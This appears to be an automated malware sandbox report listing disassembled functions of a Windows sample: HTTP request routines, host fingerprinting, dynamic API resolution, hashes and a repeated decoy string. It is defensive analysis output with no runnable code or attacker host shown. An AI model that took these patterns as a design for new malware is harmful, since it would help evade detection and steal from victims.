                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974779
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: c145f849ac7452495c12b001302f45dcce1dd29fbe6da974017faaa4d1338f2a
                                        • Instruction ID: ab9ada8029fa94b9cba6af864e16a46db1566e051b9877481ef3fa87fb2991a5
                                        • Opcode Fuzzy Hash: c145f849ac7452495c12b001302f45dcce1dd29fbe6da974017faaa4d1338f2a
                                        • Instruction Fuzzy Hash: D14144227D26056BCA35FBEC88FEF9E77527FC2718F429282AEA4122D0C770550046A6

                                        Control-flow Graph (graph image not reproduced; its legend marked basic blocks as Executed or Not Executed)
                                        control_flow_graph 1033 9762d0-97635b call 98aab0 call 974800 call 98aa50 InternetOpenA StrCmpCA 1040 976364-976368 1033->1040 1041 97635d 1033->1041 1042 97636e-976392 InternetConnectA 1040->1042 1043 976559-976575 call 98aab0 call 98ab10 * 2 1040->1043 1041->1040 1044 97654f-976553 InternetCloseHandle 1042->1044 1045 976398-97639c 1042->1045 1061 976578-97657d 1043->1061 1044->1043 1047 97639e-9763a8 1045->1047 1048 9763aa 1045->1048 1051 9763b4-9763e2 HttpOpenRequestA 1047->1051 1048->1051 1053 976545-976549 InternetCloseHandle 1051->1053 1054 9763e8-9763ec 1051->1054 1053->1044 1056 976415-976455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 9763ee-97640f InternetSetOptionA 1054->1057 1059 976457-976477 call 98aa50 call 98ab10 * 2 1056->1059 1060 97647c-97649b call 988ad0 1056->1060 1057->1056 1059->1061 1067 97649d-9764a4 1060->1067 1068 976519-976539 call 98aa50 call 98ab10 * 2 1060->1068 1071 976517-97653f InternetCloseHandle 1067->1071 1072 9764a6-9764d0 InternetReadFile 1067->1072 1068->1061 1071->1053 1076 9764d2-9764d9 1072->1076 1077 9764db 1072->1077 1076->1077 1080 9764dd-976515 call 98acc0 call 98abb0 call 98ab10 1076->1080 1077->1071 1080->1072
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • InternetOpenA.WININET(00990DFF,00000001,00000000,00000000,00000000), ref: 00976331
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,0181F008,00000000,00000000,00400100,00000000), ref: 009763D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0097640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00976421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0097644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009764BD
                                        • InternetCloseHandle.WININET(00000000), ref: 0097653F
                                        • InternetCloseHandle.WININET(00000000), ref: 00976549
                                        • InternetCloseHandle.WININET(00000000), ref: 00976553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: 72bd841b7b0a38c003cb5e0e446a24899662406fa5f60915d978650285b9ed44
                                        • Instruction ID: 30f7d2f1a7d5ed0096d2d0c041605cd1c160ea495680b071b55f5a50f09e868d
                                        • Opcode Fuzzy Hash: 72bd841b7b0a38c003cb5e0e446a24899662406fa5f60915d978650285b9ed44
                                        • Instruction Fuzzy Hash: A4716F75A00218EBEF24EFA4CC55FEE7779BB84700F108199F10A6B294DBB46A84CF51

                                        Control-flow Graph (graph image not reproduced; its legend marked basic blocks as Executed or Not Executed)
                                        control_flow_graph 1356 987690-9876da GetWindowsDirectoryA 1357 9876dc 1356->1357 1358 9876e3-987757 GetVolumeInformationA call 988e90 * 3 1356->1358 1357->1358 1365 987768-98776f 1358->1365 1366 98778c-9877a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 987771-98778a call 988e90 1365->1367 1369 9877b8-9877e8 wsprintfA call 98aa50 1366->1369 1370 9877a9-9877b6 call 98aa50 1366->1370 1367->1365 1377 98780e-98781e 1369->1377 1370->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009876D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0098770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0098779A
                                        • wsprintfA.USER32 ref: 009877D0
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 7e6d67376ff3f0327de4d0ce5fe53328949e3dee14c7f839953dd093ef5068d8
                                        • Instruction ID: 175b4f7d2ef69218182cf552329e116f4cfdc36c116c0859a1d029f4d2f6b87a
                                        • Opcode Fuzzy Hash: 7e6d67376ff3f0327de4d0ce5fe53328949e3dee14c7f839953dd093ef5068d8
                                        • Instruction Fuzzy Hash: C44192B1D04248DBDB10EB94CC85BDEBBB8AF49704F100599F609AB381D778AA44CBA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00987A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: aa7526862bb4656cba044683ca16528ba122c29d6be7e93b33ced2d3ece4fb93
                                        • Instruction ID: 23d683f2aa2f2c830866c772af45f3df54bfc358676e86d791e37033e345858f
                                        • Opcode Fuzzy Hash: aa7526862bb4656cba044683ca16528ba122c29d6be7e93b33ced2d3ece4fb93
                                        • Instruction Fuzzy Hash: 49F04FB5948209EFC714DF98DD45BAEFBB8FB45711F10021AF615A3780C7B55504CBA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 9b08932b31bebae468ba05a194ea960666917288accee1e282e23146c414462d
                                        • Instruction ID: 1c0246e945d76eb85686fc5d4a3556297d2d5a10127dee7fd4595d68a4862d69
                                        • Opcode Fuzzy Hash: 9b08932b31bebae468ba05a194ea960666917288accee1e282e23146c414462d
                                        • Instruction Fuzzy Hash: AAD05E7890830C9BCB00DFE0D8497DDBB78BB09225F000655D90962240EB305441CA65

                                        Control-flow Graph (rendered as an image in the original report; raw graph data omitted). Basic blocks 989f20-98aa19: runs of GetProcAddress calls (43 against the first module, then batches of 1 to 10 against each of eight further modules loaded with LoadLibraryA in block 98a346-98a3da).
                                        APIs
                                        • GetProcAddress.KERNEL32(76210000,01805468), ref: 00989F3D
                                        • GetProcAddress.KERNEL32(76210000,01805488), ref: 00989F55
                                        • GetProcAddress.KERNEL32(76210000,01819058), ref: 00989F6E
                                        • GetProcAddress.KERNEL32(76210000,01818FF8), ref: 00989F86
                                        • GetProcAddress.KERNEL32(76210000,01819040), ref: 00989F9E
                                        • GetProcAddress.KERNEL32(76210000,0181D910), ref: 00989FB7
                                        • GetProcAddress.KERNEL32(76210000,0180A748), ref: 00989FCF
                                        • GetProcAddress.KERNEL32(76210000,0181D9B8), ref: 00989FE7
                                        • GetProcAddress.KERNEL32(76210000,0181D9D0), ref: 0098A000
                                        • GetProcAddress.KERNEL32(76210000,0181D7D8), ref: 0098A018
                                        • GetProcAddress.KERNEL32(76210000,0181DA90), ref: 0098A030
                                        • GetProcAddress.KERNEL32(76210000,018055E8), ref: 0098A049
                                        • GetProcAddress.KERNEL32(76210000,01805508), ref: 0098A061
                                        • GetProcAddress.KERNEL32(76210000,01805528), ref: 0098A079
                                        • GetProcAddress.KERNEL32(76210000,01805548), ref: 0098A092
                                        • GetProcAddress.KERNEL32(76210000,0181D9A0), ref: 0098A0AA
                                        • GetProcAddress.KERNEL32(76210000,0181DA78), ref: 0098A0C2
                                        • GetProcAddress.KERNEL32(76210000,0180A4F0), ref: 0098A0DB
                                        • GetProcAddress.KERNEL32(76210000,01805568), ref: 0098A0F3
                                        • GetProcAddress.KERNEL32(76210000,0181D970), ref: 0098A10B
                                        • GetProcAddress.KERNEL32(76210000,0181D9E8), ref: 0098A124
                                        • GetProcAddress.KERNEL32(76210000,0181DA00), ref: 0098A13C
                                        • GetProcAddress.KERNEL32(76210000,0181DAA8), ref: 0098A154
                                        • GetProcAddress.KERNEL32(76210000,01805608), ref: 0098A16D
                                        • GetProcAddress.KERNEL32(76210000,0181D958), ref: 0098A185
                                        • GetProcAddress.KERNEL32(76210000,0181D988), ref: 0098A19D
                                        • GetProcAddress.KERNEL32(76210000,0181D8B0), ref: 0098A1B6
                                        • GetProcAddress.KERNEL32(76210000,0181D8C8), ref: 0098A1CE
                                        • GetProcAddress.KERNEL32(76210000,0181D838), ref: 0098A1E6
                                        • GetProcAddress.KERNEL32(76210000,0181D868), ref: 0098A1FF
                                        • GetProcAddress.KERNEL32(76210000,0181DA18), ref: 0098A217
                                        • GetProcAddress.KERNEL32(76210000,0181DA30), ref: 0098A22F
                                        • GetProcAddress.KERNEL32(76210000,0181D7F0), ref: 0098A248
                                        • GetProcAddress.KERNEL32(76210000,0180FD18), ref: 0098A260
                                        • GetProcAddress.KERNEL32(76210000,0181DA48), ref: 0098A278
                                        • GetProcAddress.KERNEL32(76210000,0181DA60), ref: 0098A291
                                        • GetProcAddress.KERNEL32(76210000,01805588), ref: 0098A2A9
                                        • GetProcAddress.KERNEL32(76210000,0181D7C0), ref: 0098A2C1
                                        • GetProcAddress.KERNEL32(76210000,018056E8), ref: 0098A2DA
                                        • GetProcAddress.KERNEL32(76210000,0181D898), ref: 0098A2F2
                                        • GetProcAddress.KERNEL32(76210000,0181D808), ref: 0098A30A
                                        • GetProcAddress.KERNEL32(76210000,018055A8), ref: 0098A323
                                        • GetProcAddress.KERNEL32(76210000,01805648), ref: 0098A33B
                                        • LoadLibraryA.KERNEL32(0181D820,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A34D
                                        • LoadLibraryA.KERNEL32(0181D850,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A35E
                                        • LoadLibraryA.KERNEL32(0181D880,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A370
                                        • LoadLibraryA.KERNEL32(0181D8E0,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A382
                                        • LoadLibraryA.KERNEL32(0181D8F8,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A393
                                        • LoadLibraryA.KERNEL32(0181D928,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A3A5
                                        • LoadLibraryA.KERNEL32(0181D940,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A3B7
                                        • LoadLibraryA.KERNEL32(0181DAC0,?,00985EF3,00990AEB,?,?,?,?,?,?,?,?,?,?,00990AEA,00990AE7), ref: 0098A3C8
                                        • GetProcAddress.KERNEL32(751E0000,01805188), ref: 0098A3EA
                                        • GetProcAddress.KERNEL32(751E0000,0181DAD8), ref: 0098A402
                                        • GetProcAddress.KERNEL32(751E0000,018189A8), ref: 0098A41A
                                        • GetProcAddress.KERNEL32(751E0000,0181DD90), ref: 0098A433
                                        • GetProcAddress.KERNEL32(751E0000,018051A8), ref: 0098A44B
                                        • GetProcAddress.KERNEL32(700F0000,0180A590), ref: 0098A470
                                        • GetProcAddress.KERNEL32(700F0000,018051C8), ref: 0098A489
                                        • GetProcAddress.KERNEL32(700F0000,0180A5B8), ref: 0098A4A1
                                        • GetProcAddress.KERNEL32(700F0000,0181DCE8), ref: 0098A4B9
                                        • GetProcAddress.KERNEL32(700F0000,0181DBE0), ref: 0098A4D2
                                        • GetProcAddress.KERNEL32(700F0000,018050E8), ref: 0098A4EA
                                        • GetProcAddress.KERNEL32(700F0000,01805048), ref: 0098A502
                                        • GetProcAddress.KERNEL32(700F0000,0181DC70), ref: 0098A51B
                                        • GetProcAddress.KERNEL32(753A0000,01804FC8), ref: 0098A53C
                                        • GetProcAddress.KERNEL32(753A0000,01805288), ref: 0098A554
                                        • GetProcAddress.KERNEL32(753A0000,0181DCD0), ref: 0098A56D
                                        • GetProcAddress.KERNEL32(753A0000,0181DCB8), ref: 0098A585
                                        • GetProcAddress.KERNEL32(753A0000,018052E8), ref: 0098A59D
                                        • GetProcAddress.KERNEL32(76310000,0180A518), ref: 0098A5C3
                                        • GetProcAddress.KERNEL32(76310000,0180A5E0), ref: 0098A5DB
                                        • GetProcAddress.KERNEL32(76310000,0181DBC8), ref: 0098A5F3
                                        • GetProcAddress.KERNEL32(76310000,018052A8), ref: 0098A60C
                                        • GetProcAddress.KERNEL32(76310000,01804F48), ref: 0098A624
                                        • GetProcAddress.KERNEL32(76310000,0180A7C0), ref: 0098A63C
                                        • GetProcAddress.KERNEL32(76910000,0181DD60), ref: 0098A662
                                        • GetProcAddress.KERNEL32(76910000,01805308), ref: 0098A67A
                                        • GetProcAddress.KERNEL32(76910000,018189B8), ref: 0098A692
                                        • GetProcAddress.KERNEL32(76910000,0181DD18), ref: 0098A6AB
                                        • GetProcAddress.KERNEL32(76910000,0181DAF0), ref: 0098A6C3
                                        • GetProcAddress.KERNEL32(76910000,018051E8), ref: 0098A6DB
                                        • GetProcAddress.KERNEL32(76910000,01805208), ref: 0098A6F4
                                        • GetProcAddress.KERNEL32(76910000,0181DDA8), ref: 0098A70C
                                        • GetProcAddress.KERNEL32(76910000,0181DD78), ref: 0098A724
                                        • GetProcAddress.KERNEL32(75B30000,01804FE8), ref: 0098A746
                                        • GetProcAddress.KERNEL32(75B30000,0181DBF8), ref: 0098A75E
                                        • GetProcAddress.KERNEL32(75B30000,0181DB20), ref: 0098A776
                                        • GetProcAddress.KERNEL32(75B30000,0181DB38), ref: 0098A78F
                                        • GetProcAddress.KERNEL32(75B30000,0181DC10), ref: 0098A7A7
                                        • GetProcAddress.KERNEL32(75670000,01804F88), ref: 0098A7C8
                                        • GetProcAddress.KERNEL32(75670000,01805268), ref: 0098A7E1
                                        • GetProcAddress.KERNEL32(76AC0000,01805228), ref: 0098A802
                                        • GetProcAddress.KERNEL32(76AC0000,0181DD30), ref: 0098A81A
                                        • GetProcAddress.KERNEL32(6F4E0000,01805008), ref: 0098A840
                                        • GetProcAddress.KERNEL32(6F4E0000,01805068), ref: 0098A858
                                        • GetProcAddress.KERNEL32(6F4E0000,01804F68), ref: 0098A870
                                        • GetProcAddress.KERNEL32(6F4E0000,0181DB08), ref: 0098A889
                                        • GetProcAddress.KERNEL32(6F4E0000,01805028), ref: 0098A8A1
                                        • GetProcAddress.KERNEL32(6F4E0000,018050C8), ref: 0098A8B9
                                        • GetProcAddress.KERNEL32(6F4E0000,01805248), ref: 0098A8D2
                                        • GetProcAddress.KERNEL32(6F4E0000,01804FA8), ref: 0098A8EA
                                        • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0098A901
                                        • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0098A917
                                        • GetProcAddress.KERNEL32(75AE0000,0181DB68), ref: 0098A939
                                        • GetProcAddress.KERNEL32(75AE0000,018189C8), ref: 0098A951
                                        • GetProcAddress.KERNEL32(75AE0000,0181DB50), ref: 0098A969
                                        • GetProcAddress.KERNEL32(75AE0000,0181DC58), ref: 0098A982
                                        • GetProcAddress.KERNEL32(76300000,01805108), ref: 0098A9A3
                                        • GetProcAddress.KERNEL32(6FE40000,0181DC28), ref: 0098A9C4
                                        • GetProcAddress.KERNEL32(6FE40000,018052C8), ref: 0098A9DD
                                        • GetProcAddress.KERNEL32(6FE40000,0181DB80), ref: 0098A9F5
                                        • GetProcAddress.KERNEL32(6FE40000,0181DC40), ref: 0098AA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: 7be5509b06fd1108f8ca403579fdb56eed4b4cf7e90cdf698bce0185210e9637
                                        • Instruction ID: 442d29dc3c2f07c8f9c7f48d9cd6ed04770ae288f39743d26af6cbfd60d1bfde
                                        • Opcode Fuzzy Hash: 7be5509b06fd1108f8ca403579fdb56eed4b4cf7e90cdf698bce0185210e9637
                                        • Instruction Fuzzy Hash: BE6218BD608241DFC354DFA8ED88B5E7BA9B78F602310871ABA09C3274D775A944CB61

                                        Control-flow Graph (rendered as an image in the original report; raw graph data omitted). Basic blocks 9748d0-974ff2: InternetOpenA and StrCmpCA, then InternetConnectA, HttpOpenRequestA, string building with lstrlen, HttpSendRequestA, an InternetReadFile loop (974e82-974eac), and InternetCloseHandle on exit paths.
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00974965
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 0097498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00974B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00990DDE,00000000,?,?,00000000,?,",00000000,?,0181FCD0), ref: 00974E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00974E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00974E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00974E99
                                        • InternetCloseHandle.WININET(00000000), ref: 00974EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 00974F15
                                        • HttpOpenRequestA.WININET(00000000,0181FB90,?,0181F008,00000000,00000000,00400100,00000000), ref: 00974B65
